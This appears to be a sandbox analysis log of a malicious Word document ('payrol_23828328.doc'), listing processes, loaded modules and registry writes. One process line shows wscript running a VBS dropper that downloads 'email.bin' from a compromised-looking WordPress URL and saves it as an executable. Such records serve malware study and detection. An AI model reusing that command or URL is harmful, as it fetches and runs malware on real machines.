c:\program files\microsoft office\office14\msproof7.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\prntvpt.dll
c:\windows\system32\comsvcs.dll
c:\windows\system32\atl.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\msxml3.dll
c:\program files\common files\microsoft shared\proof\mslid.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll

PID: 2748

CMD: cmd /c ""C:\Colorfonts32\B4D9D02119.cmd" "

Path: C:\Windows\system32\cmd.exe

Indicators: No indicators

Parent process: WINWORD.EXE

User: admin

Integrity Level: MEDIUM

Exit code: 0

Version:

Company: Microsoft Corporation

Description: Windows Command Processor

Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wscript.exe
c:\windows\system32\apphelp.dll
c:\windows\system32\ntvdm.exe

PID: 3908

CMD: wscript //nologo c:\Colorfonts32\visitcard.vbs http://www.astonairgroup.com/wp-content/uploads/revslider/templates/real-estate-slider/email.bin c:\Colorfonts32\secpi15.exe

Path: C:\Windows\system32\wscript.exe

Indicators

Parent process: cmd.exe

User: admin

Integrity Level: MEDIUM

Exit code: 0

Version:

Company: Microsoft Corporation

Description: Microsoft ® Windows Based Script Host

Version: 5.8.7600.16385

Modules

Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\scrrun.dll

PID: 2868

CMD: "C:\Windows\system32\ntvdm.exe" -i1

Path: C:\Windows\system32\ntvdm.exe

Indicators: No indicators

Parent process: cmd.exe

User: admin

Integrity Level: MEDIUM

Exit code: 0

Version:

Company: Microsoft Corporation

Description: NTVDM.EXE

Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Image
c:\windows\system32\ntvdm.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\winmm.dll
c:\windows\system32\ntvdmd.dll
c:\windows\system32\vdmredir.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll

Registry activity

Total events

2763

Read events

1704

Write events

1030

Delete events

Modification events

PID

Process

Operation

Key

Name

Value

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes

ShellExtBMP

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes

ShellExtIcon

332

WinRAR.exe

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

LanguageList

en-US

332

WinRAR.exe

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

@C:\Windows\system32\NetworkExplorer.dll,-1

Network

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\ArcHistory

C:\Users\admin\AppData\Local\Temp\payrol_23828328.doc.zip.zip

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths

name

120

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths

size

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths

type

120

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths

mtime

100

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\Interface

ShowPassword

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin

Placement

2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\General

LastFolder

C:\Users\admin\AppData\Local\Temp

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

name

120

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

size

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

psize

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

type

120

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

mtime

100

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

crc

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout

Band56_0

38000000730100000402000000000000D4D0C8000000000000000000000000003E0102000000000039000000B40200000000000001000000

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout

Band56_1

38000000730100000500000000000000D4D0C8000000000000000000000000003A01020000000000160000002A0000000000000002000000

332

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout

Band56_2

38000000730100000400000000000000D4D0C8000000000000000000000000002E0103000000000016000000640000000000000003000000

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes

ShellExtBMP

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes

ShellExtIcon

1536

WinRAR.exe

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

LanguageList

en-US

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\ArcHistory

C:\Users\admin\AppData\Local\Temp\payrol_23828328.doc.zip.zip

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\ArcHistory

C:\Users\admin\Desktop\payrol_23828328.doc.zip

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths

name

120

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths

size

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths

type

120

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths

mtime

100

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\Interface

ShowPassword

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin

Placement

2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\General

LastFolder

C:\Users\admin\Desktop

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

name

120

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

size

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

psize

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

type

120

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

mtime

100

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths

crc

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout

Band56_0

38000000730100000402000000000000D4D0C8000000000000000000000000004C0103000000000039000000B40200000000000001000000

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout

Band56_1

38000000730100000500000000000000D4D0C8000000000000000000000000004A01030000000000160000002A0000000000000002000000

1536

WinRAR.exe

write

HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout

Band56_2

38000000730100000400000000000000D4D0C800000000000000000000000000540103000000000016000000640000000000000003000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

b<h

623C6800600F0000010000000000000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1033

Off

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1041

Off

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1046

Off

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1036

Off

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1031

Off

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1040

Off

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1049

Off

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

3082

Off

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

WORDFiles

1333919807

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

ProductFiles

1333919924

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources

UISnapshot

1033;1046;1036;1031;1040;1041;1049;3082;1042;1055

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources

UIFallback

1040;0;1033;1046;1036;1031;1041;1049;3082;1042;1055

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources

HelpFallback

0;1033;1046;1036;1031;1040;1041;1049;3082;1042;1055

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1033

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1046

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1036

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1031

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1040

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1041

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1049

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

3082

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1042

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1055

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{0C12CF48-451D-45AC-A927-F5FDBFC07C96}

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{9C3CFE2A-537A-479A-A1E2-85728C400F7D}

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{A8716C2B-35ED-4EE7-A138-FBA0A7C9B5B0}

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{AA3BD3AB-AD94-4243-86C5-8AE3D7D829BC}

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{BC29864C-2254-4A9E-9F4D-721A388618BB}

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\User Settings\Kosmarttag_SmartTag

Count

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

ProductFiles

1333919925

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage

StemmerFiles_1042

1333919745

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word

MTTT

600F000060E87D033DA9D50100000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

7>h

373E6800600F000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

b>h

623E6800600F000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap

UNCAsIntranet

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap

AutoDetect

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

z"h

7A226800600F000006000000010000006600000002000000560000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C0070006100790072006F006C005F00320033003800320038003300320038002E0064006F006300000000000000

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

ProductFiles

1333919926

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

ProductFiles

1333919927

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

VBAFiles

1333919751

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU

Max Display

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU

Item 1

[F00000000][T01D5A93D07379500][O00000000]*C:\Users\admin\Desktop\

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU

Item 2

[F00000000][T01D56F995041B2E0][O00000000]*C:\Users\admin\Documents\

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU

Item 3

[F00000000][T01D56F98784E7EE0][O00000000]*C:\Users\admin\Downloads\

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Max Display

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 1

[F00000000][T01D5A93D07379500][O00000000]*C:\Users\admin\Desktop\payrol_23828328.doc

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 2

[F00000000][T01D3DBB3B5D16600][O00000000]*C:\Users\admin\Desktop\meanskills.rtf

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 3

[F00000000][T01D58E7D80224A80][O00000000]*C:\Users\admin\Desktop\onehome.rtf

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 4

[F00000000][T01D31845FB99B100][O00000000]*C:\Users\admin\Desktop\standadvertise.rtf

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 5

[F00000000][T01D4B9A9DCEAC580][O00000000]*C:\Users\admin\Desktop\wantedafrica.rtf

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 6

[F00000000][T01D55D28E26DC900][O00000000]*C:\Users\admin\Documents\forcedocuments.rtf

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 7

[F00000000][T01D3B911D7379600][O00000000]*C:\Users\admin\Documents\mapcurrently.rtf

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 8

[F00000000][T01D46DE5FCC17280][O00000000]*C:\Users\admin\Documents\viano.rtf

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 9

[F00000000][T01D4E2CBE4652500][O00000000]*C:\Users\admin\Documents\millionnot.rtf

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 10

[F00000000][T01D2F59BBAED7800][O00000000]*C:\Users\admin\Documents\largestbeing.rtf

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 11

[F00000000][T01D44DEEE0894680][O00000000]*C:\Users\admin\Documents\usesmaterials.rtf

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\397B65

397B65

04000000600F00002A00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0070006100790072006F006C005F00320033003800320038003300320038002E0064006F0063001300000070006100790072006F006C005F00320033003800320038003300320038002E0064006F006300000000000100000000000000809BB0E51DA9D501657B3900657B390000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\TypeLib\{6E83DBFA-A286-4B7B-9120-C68FC9E39E61}\2.0

Microsoft Forms 2.0 Object Library

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\TypeLib\{6E83DBFA-A286-4B7B-9120-C68FC9E39E61}\2.0\FLAGS

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\TypeLib\{6E83DBFA-A286-4B7B-9120-C68FC9E39E61}\2.0\0\win32

C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\TypeLib\{6E83DBFA-A286-4B7B-9120-C68FC9E39E61}\2.0\HELPDIR

C:\Users\admin\AppData\Local\Temp\Word8.0

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}

Font

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}

IDataAutoWrapper

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}

IReturnInteger

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}

IReturnBoolean

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}

IReturnString

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}

IReturnSingle

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}

IReturnEffect

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}

IControl

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}

Controls

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}

IOptionFrame

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}

_UserForm

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}

ControlEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}

FormEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}

OptionFrameEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}

ILabelControl

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}

ICommandButton

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}

IMdcText

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}

IMdcList

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}

IMdcCombo

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}

IMdcCheckBox

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}

IMdcOptionButton

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}

IMdcToggleButton

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}

IScrollbar

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}

Tab

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}

Tabs

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}

ITabStrip

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}

ISpinbutton

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}

IImage

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLSubmitButton

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLImage

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLReset

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLCheckbox

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLOption

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLText

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLHidden

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLPassword

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLSelect

3936

